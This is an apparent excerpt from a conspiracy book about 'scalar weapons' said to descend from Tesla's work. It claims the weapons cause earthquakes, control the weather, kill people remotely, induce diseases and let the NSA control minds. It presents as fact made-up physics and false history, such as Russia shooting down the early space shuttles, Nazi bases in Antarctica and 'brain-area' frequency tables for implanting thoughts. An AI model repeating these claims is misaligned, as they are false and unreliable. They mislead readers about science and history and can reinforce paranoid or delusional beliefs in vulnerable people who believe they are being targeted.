When 2 transmitters send timed pulses, which meet, an explosion will occur which either produces energy or extracts it. If 2 crossed beams are in 'continuous' mode the energy between beams is continuous and Tesla globes and hemispheres can be made which act as a continuous shield to either destroy incoming weapons and aircraft entering it. If multiple frequencies are transmitted on the beams, at the intersection a 3 dimensional globe appears.
This can be manipulated to have very high infolded energy with any desired light emission, shape, color or intensity. It can even cause metal to soften or melt. This 'bottle' of energy can be detonated inside the earth to create an earthquake or into a building to make a 'nuclear like' explosion. This 'bottle' can be moved anywhere on the planet or through it and made any size.
The Russians in 1985 once threatened the earth itself by activating their scalar weapons with multiple scalar transmitters turned on at once, endangering the survival of the entire planet. According to nuclear physicist Bearden, they conducted a massive, 'full up' scalar weapon systems and communications strategic exercise. During this sudden exercise American Frank Golden discovered the Russians activated 27 gigantic 'power taps', established by resonating the earth electrogravitationally on 54 powerful scalar frequencies (27 pairs where the two are separated from each other by 12 kHz.) transmitted into the earth and they utilized this to stimulate the earth into forced electrogravitational resonance on all 54 frequencies. Each of the 27 power taps extracted enormous energy from the molten core of the earth itself, and turning it into ordinary electrical power.
Each giant tap is capable of powering 4 to 6 of the largest scalar EM howitzers possessed by Russia. Bearden writes: "Apparently over 100 giant scalar EM weapons were activated and a large number of command and control transmissions and it lasted several days. By alternating the potentials and loads of each of the two paired transmitters, electrical energy in enormous amounts can be extracted from the earth itself, fed by the 'giant cathode' that is the earth's molten core. Scalar EM command and control systems, including high data rate communications with underwater submarines, were also activated on a massive scale. The exercise went on for several days, as power taps were switched in and out, and command and control systems went up and down. Bearden claims not one American intelligence lab, or scientist detected this as they didn't have a detector for scalar EM radiation, and that not one officially believes that the exercise ever happened." However, it was monitored on an advanced, proprietary detection system by Frank Golden for several days and by Bearden for several hours.
This exercise proved Brezhnev's 1972 statement that by 1985 the Soviets would be prepared to do as they wish, anywhere in the world. The Soviets are using unknown attributes of matter, phenomena and laws of nature by research covering the equivalent of 7-8 U.S. atom bomb projects back to back already.
However both America and Russia are doing through the earth scalar beam transmissions and ever since then earth's internal dynamo has been affected. It suddenly experienced a sudden unexpected slowdown in rotation 1984. It has become like an unbalanced washing machine, wobbling as it spins. Scalar waves pass naturally between the center of the earth and the sun, and this coupled with multiple annual nuclear tests (which have been proven to disturb the ionosphere and magnetic field) the balance of the earth with the moon, may even cause the earth to flip, if the naturally produced scalar waves are diverted onto another course, which are keeping the earth spinning harmoniously.
5. WHAT CAN SCALAR WEAPONS DO?
A Tesla shield protecting a military target could be made of three or more concentric shields, that would produce multiple electromagnetic pulse energy and severe heating of anything which enters it. These concentric Tesla shields can also clean up and sterilize any gamma radiation resulting from an explosion of a nuclear warhead.
Nicola Tesla even in the 1920s could create a protective 3 dimensional 'shield' or 'dome' formed by 2 or more transmitters sending widened scalar beams linked together over a target in a hemisphere shape. Instead of causing the target to explode which narrow more intense crossed beams would, a wider more encompassing beam could form a large plasma shell outside something to be protected. This acted like an electrifying force field shaped like a dome, which could cause anything which entered it to have its technology dudded, (inoperative) make incoming aircraft pilots die by destroying their nervous system and/or make an incoming missile, aircraft or tank blow up.
Multiple layers could be nested made of different kinds of plasmas which would ensure nothing could penetrate a protected target's groundspace or airspace. The Russians can make a Tesla shield up to 200 miles wide. These large luminous plasma shields have been witnessed by sailors over the oceans from time to time, as various nations test their scalar weapons in secret. Tesla, as early as the 1920s created globes or bullets of plasma with crossed scalar beams sucking the energy out of the air space in a 'cold explosion' causing it to freeze, or sending extreme heat into it to burn as a very powerful laser beam.
These powerful beams can also travel right through the earth and create an earthquake at the antipodes of the earth and Tesla also experimented doing this. Hyperspace flux energy (potentials) flows as waves in a sea of intense power in the next dimension unharnessed, however when energy is manufactured artificially it can be made into different modes e.g pulse mode, energy extraction mode or explosion mode. If 2 timed pulses meet, an explosion extraction makes a sharp cooling and all heated energy is extracted out of the air back to the transmitter. This can make everything and everyone frozen. It preserves machines and buildings but not people. If a burning energy is sent the target has a nuclear like 'detonation' because energy emerges to a target destroying the nucleus of the atoms. Multiple scalar wave modes and frequencies can also be blended together into one beam as well.
Tesla globes can be manipulated to be small or large in manifold kinds of energy frequencies and directed to a target by 2 or more far away scalar transmitters. Many intense frequency small globes can be directed towards multiple incoming targets, like cannonballs causing major explosions. Alternatively a larger less intense globe sent can cause the electrics to dud in a plane, helicopter or missile causing it to malfunction and crash land. This technology has been used many times to crash planes or helicopters by using a portable scalar bazooka carried by a hidden terrorist or soldier.
The Vietnamese and Soviets used this technology in the Vietnam war against American aircraft. Many planes crashes with inexplicable causes can be traced to this. These Russian made portable bazookas were also used by the Serbs against American helicopters during the Bosnian war. The Soviets used scalar weapons against the Afghanistans during their war. One may wonder if this explains current American helicopter crashes in Afghanistan and Iraq.
Scalar waves can be used for impenetrable communication inside an ordinary carrier wave. Artificial potentials can be used for 2 way communication with submarines, aircraft and ships. Scalar waves can be used to tap into normal communications even when encrypted. They can even destroy the enemies equipment if they wish using lock-in mode to locate the source or just continue eavesdropping. radar invisibility can be done by putting multiple transmitters around something to make a spherical interference shell in the bandwidth of the searching radar. Nothing in the air is safe with scalar weapons or anything on the ground, because any building can be penetrated and the inside contents destroyed from either narrow or wide crossed beams.
There is nowhere to hide. Scalar beams can be sent by aircraft or satellite or even from the government UFOs of Russia, Britain, Australia and America. They can be sent from the UFOs the Nazis developed secretly in Germany during WW2, and which were relocated to their underground bases in Antarctica and all over South America before the war ended.
6. SCALAR BEAMS AGAINST INDIVIDUALS
To totally destroy a person's nervous system and kill them instantaneously, a scalar weapon can be set on 'high intensity pulse mode'. This will destroy every living cell, bacteria and all germs so the body falls down like a limp rag, not even decaying in even 30-45 days. There is no living aspect left to decay. Entire groups of people can be killed this way even in a 50 mile radius on peak power. Scalar beams set on a lower power can render a person unconscious to be revived at a later date for interrogation.
Crossed scalar beams can cover a whole range of targets from something right through the other side of the earth, to anything under the sea or ground. Not even metal will suffice to protect, as a metal softening mode can be deployed. Scalar beams can be put into X ray mode where a screen can show what is inside something, even under the sea and earth or inside buildings. This is called a remote viewing radar.
Anything in the sky can be instantly destroyed even from one country to another. All one country needs to destroy anything skybound in an enemy's country is to put 2 or more scalar transmitters forming a scalar wave-form interference grid whereby a shield is locked over a country in high intensity mode and this will cause anything which enters it to be destroyed. This can also destroy anything in the sea and detonate mines. The explosion shows up on the screen as a blossoming of the moving light on the square.
The Russians mainly use their interference grids over the USA to control the weather moving hot or cold air where they can meet and create storms, hurricanes, torrential rain or droughts as they please. Earthquakes can be created along with volcanoes erupting according to Tom Bearden. Moisture can be brought from the ocean and sent overland and cold air from the north sent south. Violent thunderstorms can be created. He also claims since 1989 the Japanese Yazuka and Aum sects lease scalar interferometers from the Russians to do weather engineering over the USA.
However America can fight back with their own scalar weapons. One can silently down passenger planes as need be by sending low frequency scalar beam to make the engine fail, either from the interference grid squares or from even portable shoulder scalar weapon bazookas which can be targeted at helicopters or any aircraft above. Surface naval vessels can be attacked through their hulls as well as ocean bottom mines detonated. Any aircraft, or land vessels including tanks can be fitted with portable scalar weapons. Though tanks can easily be destroyed with them.
Tom Bearden claims that the Soviets and Americans have been silently downing each other's aircraft since the 1980s. Soviet made scalar weapons downed American aircraft in Vietnam. Right from when USA put up their first satellites the Russians have been shooting them down in cloaked Russian made UFO's with scalar and particle beam weapons. Between 1977 and 1982 Russia shot down many US satellites. At that time they wanted complete control over the skies and had put up killer satellites complete with beam weapons to target US satellites and even the space shuttles. It has been claimed by Tom Bearden that all the early space shuttles were shot down by the Russians and duplicate shuttles were landed from another base.
There was a mad rush by the US govt to develop beam weapons to defend themselves against the Russians and they did this eventually shooting down a couple of the Russian made UFOs containing beam weapons. Revenge silently followed by passenger planes of each other's countries being targeted.
7. SCALAR MIND CONTROL
In the early 1970's Hundreds of inmates at the Gunniston Facility of the Utah State Prison were subjected to scalar wave mind control. Inmates tried unsuccessfully to fight back in court. The University of Utah researched at that time how scalar waves could induce the mind into hearing voices, overriding and implanting thoughts into the mind, as well as reading the thoughts. They also developed eye implants. In 1998 scalar waves were used to test subliminal voices in the head in 2 Utah prisons.
In Draper Prison, Utah a man called David Fratus in 1988 claimed voices in his inner ears were induced in him as clear as if listening to a set of stereo headphones. The mind control victims of US govt implants are also subjected to artificial voices in the head which are sent on scalar beam by satellite and and the HAARP transmitters and relayed to the GWEN Towers placed approximately every 200 miles across USA. Many of the messages relayed into these American mind control victims are said to come from aliens, with a 'message for mankind'. These 'alien messages' were first given to the prisoners in Utah and they all got the same messages.
The Russians, having a head start on decoding the brain can send subliminal messages by satellite over whole countries in their own languages, in scalar waves so subtle that the victims think they are their own thoughts occurring. They could make people think "God" is speaking to them and can also give a people suicidal thoughts. There is a suicide wavelength. The Russians and Israelis have been said to do this on mind control data websites. As well, the Americans have been using these subliminals to give 'voices in the head' messages (which includes to those with CIA or military controlled implants) that are supposedly from 'aliens' or "The Holy Spirit" to say e.g. the Second Coming will be here soon or earth needs to be evacuated and the person has been 'chosen'.
Only certain people can pick this up according to whether they have implants (which relay messages into the head) or if they are natural telepathics. The mineral selenium when ingested beyond normal levels is said to increase the capacity to hear voices in the head. Though certain races have a higher hearing threshold and are able to pick up synthetic telepathy sent through the atmosphere more than others.
Russia's scalar transmitters are called "Woodpeckers" because of the woodpecker type tapping transmissions detected from them on the radio band. They have the technology to send subliminals right into a person's subconscious, bypassing the brain and could drastically influence the thoughts, vision, physical functioning, emotions and conscious state of a person by sending in subliminal signals even from a great distance. In the late 1960s the Soviets broke the genetic code of the human brain. It had 44 digits or less and employed 22 frequency bands across nearly the whole EM spectrum. But only 11 of the frequency bands were independent. The Soviets found they could make a person do something just by sending subliminals into the body, bypassing the ears.
Up to 16 of the Russian Woodpecker scalar transmitters have been observed to carry a common phase-locked 10 Hz modulation. 10 Hz is used to put people into a hypnotic state. The Russians can manipulate the moods of everyone in a 75 mile radius, with a circularly polarized antenna, and people's bodies have been shown to pick up the "new" mode of expression. Even "sleep" frequency will make everyone tired and fall asleep.
8. AMERICA'S 'NO CONTACT' MASS MIND CONTROLLING NETWORK
According to the book Project L.U.C.I.D by Texe Marrs, John St Clair Akwei claims that the US National Security Agency (NSA) has had the most advanced computers in the world since the 1960's. The Signals Intelligence (SIGINT) mission of the NSA uses scalar waves for blanket coverage of the USA and can wirelessly tap into any computer in the USA and read the contents. As well as track people by the electrical currents in their bodies, which emanates a particular 'signature frequency'.
This is possible because everything in the environment gives off scalar waves at right angle rotations off the normal electromagnetic wave. These can be searched for and tracked and are not subject to constraints of time and space. A person's frequency can be stored on a supercomputer and this can be tracked anywhere. They can be sent subliminal words sent in scalar waves which are so subtle that the person will think they are their own thoughts. Also NSA uses a secret program (developed since the MKULTRA mind control program of the 1950s) what is called "Radiation Intelligence". Scientific research from this is withheld from the public and there are international intelligence agreements to keep this technology secret. Using this technology the NSA records and decodes individual brain maps of hundreds of thousands of people for national security purposes.
It is also used secretly by the military for a brain-to-computer link. Activity in the speech center of the brain can be translated into the subject's verbal thoughts and can also show up activity from their visual cortex on a video monitor. NSA operatives can see what the subject is seeing. Visual memory can also be seen and the NSA can place images directly into the visual cortex, bypassing the eyes and the optic nerves.
When a target sleeps secretly images can be installed into the brain during REM sleep for brain-programming purposes. Speech, 3D sound, and subliminal audio can also be sent to the auditory cortex of the brain, bypassing the ears. This "Remote Neural Monitoring" (RNM) can completely alter a subjects perceptions, moods and motor control. Different brainwave frequencies are connected with various parts of the body and when the right frequency to activate a section of the body is sent a person is powerless to stop it. Pain can be induced in mind control victims this way by targeting a section of the body. This has been spoken of by many mind control victims, accompanied by 'voices in the head' by the operators cruelly asking if it hurt and all done remotely without any physical contact with the victim. There has been a SIGINT wireless scalar wave brain monitoring network in the US since the 1940s according to John St Clair Akwei.
He tells us how it is done with digitally decoding the evoked 'potentials' (see first section for more on potentials) in the 30-50Hz, 5 milliwatt electromagnetic emissions from the brain. In these emissions spikes and patterns show as evoked potentials. "Every thought, reaction, motor command, auditory event and visual image in the brain has a corresponding "evoked potential" or set of "evoked potentials". These can be decoded into the current thoughts, images and sounds going on in a target's brain. When complexly coded signals are sent to a victim, bypassing the eyes, optic nerves and ears, the faint images appear as floating 2D screens in the brain. Auditory hallucinations can be induced, creating paranoid schizophrenia.
The frequency the brain areas respond to are from 3 Hz to 50 Hz. For each brain area these are used: Brain Area: Bioelectric Resonance Frequency: Information Induced Through Modulation. Motor control cortex: 10 Hz: Motor impulse coordination Auditory cortex: 15 Hz: Sound which bypasses the ears Visual cortex: 25 Hz: Images in the brain, bypassing the eyes Somasensory: 9 Hz: Phantom touch sense Thought center: 20Hz: Imposed subconscious thoughts Only the NSA modulates this signal band into evoked potentials or scalar carriers. There are about 100 people working 24 hrs a day for the NSA at Ft Meade on this "Remote Neural Monitoring" (RNM). John St Clair Akwei, after being harassed by this NSA technology brought a lawsuit against the NSA.
During the lawsuit process he was harassed by 3D sound, and his associates were also harassed to keep him isolated. No action was taken against the NSA in the 1991 lawsuit. In 1967 an "internationally renowned scientist" and Christopher Hills, a pendulum expert, communicated with some ETs. (It is not known who the scientist was but at one time both Hills and Puharich were working with the medium Eileen Garrett and Puharich was communicating with ETs called The Nine.The same ETs that the Bilderberger group (comprised of world leaders and European royals) who control the affairs of the planet) This is what the ETs told Christopher Hills via pendulum:
In short, ETs communicated with us via modulated radio-waves, between 10,000 and 20,000 cycles below the known electromagnetic-spectrum. In the carrier-wave by amplitude modulation, mixed with frequency modulation. Single band energy, transmission power less than 25 watts. A naturally present wave on earth the brain modulated - a wave that resonates between the earth and the ionosphere. All humans influence the ionosphere in this manner. A reflecting technique involved. The brain modulation consisted of pulses, akin to those known from neuro pulses.
Two humans can use this. Related to something akin to low frequency radar and to ultrasonic techniques but qualified. A mixed electro-acoustic wave function. The electromagnetic-wave induced an ultrasonic transduction in human tissue. The brain radiation has a sonic component to it as well as an electromagnetic component. Electromagnetic-radiation has a sonic component and it's dependent on the medium through which it travels. The scientist cut through months of work. Now HAARP is slicing up the ionosphere, the world-brain, like a microwave knife, producing long tear incisions destroying the membrane which holds the reservoir of data accumulated by all earth's history. HAARP has already punched 360 x 30 miles holes in the ionosphere.
9. INDUCING DISEASES WITH SCALAR WAVES
Tom Bearden also writes that a more advanced form of scalar weapon is known as a 'quantum potential' weapon has been developed by US, Russia, China, Israel and possibly Brazil . These weapons mimic the signature or frequency of a disease by recreating them on scalar carriers. Also any disease can be imprinted onto our cellular system using frequencies ranging from ultraviolet to infrared.
Whole populations can have new diseases and death induced as well as latent diseases being activated with quantum potential diseases in targeted areas. Manufactured symptoms of radiation poisoning, chemical poisoning, bacterial infection and even the effects of many kinds of drugs including hallucinogenic ones can be induced with these very subtle scalar waves which flow in hyperspace or the sea of ether. They become imbedded right into the immune system or etheric counterpart of the physical body.
On the www.freedomdomain.com site a man called Kaznacheyev found that the induction of diseases could be effected by the Woodpecker scalar transmitters in the near ultraviolet range. Experiments at the University of Marburg in West Germany duplicated these disease inducing scalar wave experiments in infrared. Dr Popp of West Germany, after analyzing the virtual photon master control system of the cells found that scalar virtual particle flux which determines the genetic blueprint pattern of the cells can be easily entered with scalar techniques to induce disease and cell disorder at will.
10 . TESLA'S SCALAR WAVE TECHNOLOGY WAS SECRETLY CONTINUED BY RUSSIA AND THE NAZIS
While the American government rejected Tesla's energy without wires and left him penniless, Russia and Germany asked Tesla to work for them. He turned them down, but according to Preston Nichols he faked his death in 1943 and was spirited away to the UK. From then on it was a frenzied battle between the Soviets and Germany to develop scalar technology. Russia got a head start in learning how scalar waves can be drawn from hyperspace by sending an agent to seek out a man in Utah who built a machine for doing this Utah. A Soviet agent destroyed the device after learning how the machine operated.
The man, T H Moray learned about Tesla's 'sea of ether' and had made a scalar interferometer. Germany had developed anti-gravity technology in 1939 by back-engineering a crashed UFO. By WW2, they led the world in radar and infrared science as well as radar absorbing materials and radar cross section. Some leading western experts think they developed radar cross section beyond western levels today, but there is evidence of an alien alliance during the war so this may have been influential. The Germans were using time reversed waves, which caused a scalar wave to follow back and respond to the source of a received ordinary electromagnetic wave.
During WW2 many of the best Nazi scientists escaped to a base they'd developed secretly in Antarctica, getting supplies from South Africa as well as to German communities in Argentina, Chile, Paraguay, Peru, Uruguay, and other Latin America countries. After the war Americans moved the remainder of the best Nazi scientists to US, with the Soviets, French and British taking the remainder to their countries. However the Soviets became angry at the Americans for taking first choice of Nazi scientific brains, so in 1946 they just cleaned out the majority of scientists and technicians back to the Soviet Union, about 275,000 men plus all their families from Soviet occupied eastern Germany.
By the 1950 the Soviets had developed time-reversed waves. They has also forced the captured Germans to build them a fleet of anti-grav saucers complete with particle beam and scalar beam weapons. In Antarctica the Nazis had Tesla's "Death Ray", capable of sending a lethal beam even to the moon to create an incandescent spot, when aimed at it. Tesla devastated with his "Death Ray" - likened to a modern day particle beam weapon.
According to Al Bielek the Russians have particle beam weapons which can shoot 1000 miles into space, and they use these to shoot down any UFO within 200 miles radius of their sky. The Americans also have many particle beam weapons and they too shoot down UFOs. There is apparently a war going on in space, and the Russians and Americans have secretly got together to fight it. It is unknown who the UFO occupants are, but the Nazi's in Antarctica are said to be invincible with their superweapons.
11. IS THERE A SECRET WAR GOING IN THE SKIES?
Japan now has scalar weapons and has got together with Russia to develop them. In 1991, according to Harry Mason, Russian President Gorbechev offered to lease the Japanese the super-secret intercontinental scalar weapons, capable of producing earthquakes for $900 million, which they'd used in the Soviet Union since the 1960's. Tom Bearden also claims they leased them in 1989. A Joint Russian-Japanese university was set up to develop new weapons with Japanese microchips to overpower the US and jointly rule the world. After Tesla "died" in 1943, his papers were sent to a Tesla Museum in Yugoslavia, where the Japanese obtained the knowledge of Tesla technology. The scalar weapons were developed by a Japanese scientist an IQ higher than Einstein.
They too, like the Americans tested their scalar weapons in the outback of Western Australia, possibly using a base in Antarctica in which to send scalar waves to their Australian transmitter to produce earthquakes and Tesla globes. The Japanese scalar scientists are tied up with various cults and feel that the Japanese emperor should rule the planet, as well as having a policy of exacting revenge on former enemies culminating in a "Final War" against the Christian west and Islamic world.
It is the Japanese Aum sect and Yakuza mafia who are still leasing the Russian scalar transmitters and have steadily used them for weather engineering over America since the nineties for target practice. Bearden claims that the Japanese may be allowed by the Russians to down planes now and then. The Japanese cult members in their govt are also tied up with North Korean cult members. The Russians have been weather engineering over America since the 1960's using their interference grid to target specific areas.
12. WHO ELSE IS CONTINUING TESLA'S SCALAR TECHNOLOGY?
Unlike Western universities, Eastern Europe and Russia have always included Tesla's scalar wave research openly in their curriculum and so they got a head start with multiple facilities built all over the Soviet Union to build scalar weapon transmitters starting from the 1950's. This was further hastened by making captured East German scientists work for the Soviets leading that country straight into the space age, giving them UFOs fitted with scalar and particle beam weapons.
The UFOs even had cloaking technology. America, even though they had Nazi scientists working for them after the war at Area 51 on anti-gravity, didn't realize how advanced the Soviets had become with scalar technology until they found out they'd been secretly attacked during the 1950's undetected. In 1960 the Soviet premier Kruschev announced to the world, that they had "superweapons". In 1963 they deliberately destroyed a US atomic submarine undersea by Puerto Rico with scalar weapons. They next day over the Puerto Rico Trench the Soviets used scalar weapons in a different mode to produce a giant underwater explosion. US was defenseless against an unknown type of weapon. In 1965 the Great Sandy Desert in Western Australia was mapped out and chosen by the US govt to begin scalar weapons testing.
Even though 'officially' Tesla's papers were kept by the FBI after he died and were labeled 'top secret', lest they get into the hands of the enemy, Tesla had passed all his knowledge and research onto a young American physicist 2 weeks before he died in 1943. The US military in Western Australia tested crossed scalar beams aimed into the ground to create earthquakes on a target map of squares and also created Tesla globes from crossed scalar beams in the sky. Pine Gap the secret underground American military base has 2 scalar transmitters and they also have at least another in Exmouth, N Western Australia. Others American scalar transmitters besides various ones all over USA are at Alaska, Puerto Rico, Greenland, Norway and Antarctica.
Though many countries have scalar weapons now, other countries could easily be target of those with scalar weapons and never know what the cause of their explosions, mind control or weather engineering. So of course more and more countries are getting the scalar technology needing it to defend themselves as well and this keeps getting passed on especially by the Russians. The other thing is one may know it is a scalar attack but have no idea who did it. The known countries which have scalar weapons are: America, Russia, France, Australia, Germany, Japan, China, Taiwan, South Africa, Israel, Brazil, UK and Argentina as well as various populations of Nazis still operating in Antarctica and all over South America. It is unknown how Brazilians got scalar weapons and quantum potential weapons, but the Brazilians have had alien technology for some time and also the Vatican has covert technology and has been said to have a base for this in Sth America for their secret space program.
There is extensive coverage of Brazil's space program in my 40 page article "Scalar Weapons: Read it and Weep". This covers China and Japan's weapons as well as extensive coverage of Russia's attacks on America, especially the space shuttles and the technology of the Nazis in Antarctica. Others may have them such as Ukraine and Nth Korea but as yet no proof exists for these countries. Even in the alternative press not enough has been said about scalar weapons to the extent where normal conspiracy researchers and writers are as familiar with their dangers as they should be because even online they hardly get a mention on conspiracy sites. Yet they are probably the most life threatening on the planet, that is known.
For more information see: http://www.theuniversalseduction.com
The Universal Seduction Vol 3: Scalar Weapons. Read It And Weep by Christi Verismo.
For more on America's use of Tesla technology and joint alien/US military undereground bases in Australia, anti-gravity technology and use of time portals.
The Universal Seduction Vol 2. Pine Gap, Australia's Area 51 by Christi Verismo.
The Lost Journals of Nicola Tesla by Tim Swartz and Mind Control by Tim Swartz in:
The Universal Seduction Vol 1
and The Lost Journals of Nicola Tesla - HAARP - Chemtrails and the Secret of Alternative 4
http://www.members.tripod.com/uforeview/swartz.html
Secret Black Projects of the NWO by Tim Swartz. Abelard Productions.
http://www.members.tripod.com/uforeview/swartz.html
About the Nazis in Antarctica:
Evil Agenda Of The Secret Government By Tim Swartz
http://www.members.tripod.com/uforeview/swartz.html
Nikola Tesla: Journey to Mars - Are We Already There? By Sean Casteel
http://www.members.tripod.com/uforeview/teslabooks.html
Nikola Tesla - Free Energy and the White Dove by Commander X
http://www.members.tripod.com/uforeview/commanderx.html
Incredible Technologies of the New World Order: UFOs-Tesla-Area 51 by Commander X
http://www.members.tripod.com/uforeview/commanderx.html
Tom Bearden's scalar weapon website, http://www.cheniere.org
The Historical Background of Scalar Weapons by Tom Bearden.
The Historical Background of Scalar Weapons By Tom Bearden
Tom Bearden on what the Russians have been doing since the late 1950's with scalar technology against the U.S. and numerous more examples of scalar attacks can be found at:
http://www.earthchangestv.com/ufo/0209gandor.htm
http://216.247.92.101/pub/bearden/examples.htm
http://www.cheniere.org/correspondence/110502.htm
Scalar Wars: The Brave New World of Scalar Electromagnetics
http://216.247.92.101/pub/bearden/scalar_wars.htm
For the US and Japanese military testing of scalar weapons in Australia, see Harry Mason's 'Bright Skies':
Harry Mason's "Bright Skies
For US scalar activity and joint alien underground bases in Australia: Fortress Australia:
http://rumormillnews.com/FORTRESS_AUSTRALIA.htm
For the true story of the Russians shooting down the space shuttles and the Russian UFO development:
Fire From The Sky: http://www.anomalous-images.com/text/files.html
For more on America's scalar technology:
HAARP. the Ultimate Weapon of the Conspiracy by Jerry E Smith.
http://www.jerryesmith.com
Also The End of the World by Jerry E Smith The Universal Seduction Vol 3
Commentary on the book Day After Roswell by Sean Casteel. (about reverse engineering crashed UFOs etc) The Universal Seduction Vol 3
Also in Vol 3 of The Universal Seduction, 4 more chapters called:
US patents of Mind Control.
The Secrets of Mind Control.
Domestic Surveillance, Mind Control Technology and the NSA.
The Montauk Project and Physics Run Amok by Alexander Bruce.
For more on how time operates through the gridlines by Bruce Cathie:
How Time Operates Through The Gridlines By Bruce Cathie
For more on the Nazi's anti-gravity saucers: UFOs Nazi Secret Weapon? Mattern-Friedrich. Samisdat Publishers Toronto, Canada. (About 1966.)
For more on the US anti-gravity program: The Hunt For Zero Point by Nick Cook.
For Brazil's contact with aliens: My Contact With UFOs (also known as flying saucers) by Dino Kraspedon.
My website for more data.
http://www.angelfire.com/oz/cv/index.html
Excerpt from the chapter:
SCALAR WEAPONS: READ IT AND WEEP - Part 1 of 6 excerpts.
By Christi Verismo
http://www.angelfire.com/oz/cv/cverismo3e1.html
Please send far and wide as a warning about the dangers of approx 15 nations having dangerous scalar weapons. Inability to keep track of and understand advanced physics is why this problem of ignorance has occured, letting multiple nations have terrifying scalar beam technology which can destroy the whole planet at the press of a few buttons. This 40 page chapter is easy to understand for the non scientific. Permission to repost as long as left unaltered, with author, book title and website intact.
Book excerpt from Vol 3 of http://www.theuniversalseduction.com
Part 1
THE DISCOVERY OF SCALAR WAVES
BEAM WEAPONS OF A CENTURY AGO
THE CONTINUATION OF TESLA’S SCALAR WAVE TECHNOLOGY
TESLA’S CROSSED SCALAR BEAMS
RUSSIA’S ‘WOODPECKER’ SCALAR WAVE TRANSMITTERS
THE 1930s,
THE 1940s,
THE 1950s,
THE 1960s,
THE 1970s,
THE 1980s,
THE 1990s
THE PRESENT
WHAT CAN BE DONE WITH SCALAR TECHNOLOLGY?
MIND READING, MASS HYPNOTISM AND SYNTHETIC TELEPATHY
DISEASE INDUCTION
DISABLING SATELLITES
IN THE AIR
WEATHER ENGINEERING
EARTHQUAKES
SEA ATTACKS
TESLA SHIELDS AND GLOBES
GROUND ATTACKS
OBLITERATING INDIVIDUALS
PORTABLE SCALAR BAZOOKAS
RADAR INVISIBILITY
SUMMARY OF A WAR THAT COULD OCCUR
RUSSIAN UFOs ATTACKED THE US SHUTTLE PROGRAM FROM THE BEGINNING
HOW DID RUSSIA GET UFOs?
FORMER BOLSHEVIKS RUNNING AMERICA
REPLICAS USED FOR THE LANDINGS, AFTER ORIGINALS SHOT DOWN
CLOAKED RUSSIAN UFOS ABOVE USA
ALL U.S. SATELLITES SHOT DOWN BY RUSSIA UNTIL 1981
LIES, LIES AND LIES
FRICTION WITH THE JAPANESE
ENTERPRISE SHUTTLE DETERMINED TO SPY ON RUSSIA
RUSSIA INTENSIFIES ATTACKS
TRYING AGAIN TO GET UP INTO SPACE. THIRD TIME LUCKY?
BOLD ATTACKS ON AMERICA
THE STRUGGLE AT THE TOP FOR POWER
THE STEALTH PLANE COMES TO THE RESCUE
PHANTOM AGAINST THE COSMOSPHERE
THE EXPECTED GENOCIDE
PLANS FOILED TO DESTROY RUSSIA’S MILITARY ARSENAL
BRAZIL
INDIA
JAPAN
KOBE 'EARTHQUAKE'
CHINA
OKLAHOMA FED BUILDING ‘BOMBING’
WHO ELSE HAS UFOs?
THE DISCOVERY OF SCALAR WAVES
It all started in the 18th century with a Scotsman named James Clerk Maxwell(1831-1879). He was a mathematical genius and his work led to the development of quantum physics which later led to Einstein’s Relativity. Maxwell’s equations linked electricity and magnetism and he discovered other waves that were higher than the normal hertzian electromagnetic waves. They are positioned at right angles coming off the electromagnetic wave and are omni-directional, whereas normal hertzian electromagnetic waves are only measureable with normal equipment and travel in a straight line. They are also called gravitic waves because they belong to the gravitational field. (Please see glossary for other names for scalar waves) Maxwell’s electromagnetic spectrum went higher than our 3D physical reality and into hyperspace where the fine indiscernable scalar waves exist. (Maxwell said they flowed in the ether/hyperspace). Scalar waves are so fine that they are only one-hundred-millionth of a square centimeter in width hence finer than X-rays and gamma rays. They can also be manipulated into various types of modes and frequencies. When Maxwell died his work was interpreted by three experts (including Hertz) who set the foundation for physics, and they decided any wave that went beyond what could be measured with an instrument of that time was "mystical" therefore worthless.
According to Tom Bearden, standard physics (from then on) as a discipline, contained twenty two errors. Nicola Telsa, (1856 or 1857-1943) a Yugoslavian genius, who became a US citizen in 1891 carried on with Maxwell’s work. Tesla worked for Thomas Edison, who invented direct current, while Telsa himself invented alternating current, but the two men didn’t get along well and parted ways. Tesla started up laboratories on Long Island and in Colorado Springs and learned how to harness scalar waves from one transmitter to another without using any wires. He received partial financial backing from JP Morgan, who owned the new electricity projects, but Morgan wasn’t interested in losing all his electricty business by allowing people to tap into the vacccum of pure energy (hyperspace) to get their own (what is now termed) ‘free-energy’ for no cost.
At that time Edison needed a plant ten stories high, taking up an entire city block to supply electricty to one square mile of customers. Tesla indentified what he called ‘Radiant Energy’ or ‘Teleforce’ in 1889. It was discovered during experiments that Tesla did to duplicate what the German Heinrich Hertz had done in 1887, proving the existence of electromagnetic waves. While copying Hertz’s experiments, Tesla experimented with violently abrupt direct current electrical discharges and discovered scalar energy, a new force, in the process. In 1904 Tesla announced he’d completed his work using scalar waves to transmit energy without wires but unfortunately when he tried to get support for it, a setback occurred. He was sued for his Colorado Springs laboratory electrical bill, and his lab was torn down. He was also sued for non payment of a loan from his lawyer and his financial troubles never abated. Tesla continued his work even though he had no money and he died penniless in a NY hotel room in 1943, although Preston Nichols in his book ‘Encounter in the Pleiades’ claims a lookalike street vagrant was cremated in his place and there may be evidence that he was spirited away to the UK.
BEAM WEAPONS OF A CENTURY AGO
Even though Tesla couldn’t interest the US govt. in his wire-free scalar energy, the Russians and Germans asked him to work for them, but he turned them down. All was not lost, just two weeks before he ‘died’ he gave all his research to a young American physicist. Tesla’s inventions were dangerous and not only did he discover scalar waves and how to use it to manufacture earthquakes but also he created a ‘Death Ray’, which has been likened to a particle beam weapon. (Particle beam weapons can shoot a laser one thousand miles into space.) After his death in 1943 the FBI was actively involved in suppressing many of Tesla's documents, including plans for his 'Death-Ray' weapon capable of destroying aircraft and his earthquake-inducing machine, deeming it ‘top-secret’ lest it fall into the enemy’s hands. But the Germans had also invented beam weapons and used them during WW2. Captured from them (according to William Cooper) was a weapon that was capable of shattering 4" thick armor at a range of two miles using low aimed, low frequency sound waves.
There is also evidence that the Germans had scalar wave technology and they certainly had anti-gravity technology due to a UFO crashing in Germany in 1939. They back-engineered it and by 1940 had built themselves a fleet of UFO’s in eight facilities all over Germany. The Russians, who took many Nazi scientists captive in Soviet occupied Germany in 1946, forced the German scientists to build them their own fleet of UFOs, which they called ‘COSMOSPHERES’ and eventually they had built hundreds. The Nazi scientists also built the Russians scalar transmitters and particle beam weapons. Tesla also told people that he talked frequently to people ‘off planet’, so perhaps this was the source of inspiration for his inventions.
Part 2 of 6 excerpts.
THE CONTINUATION OF TESLA’S SCALAR WAVE TECHNOLOGY
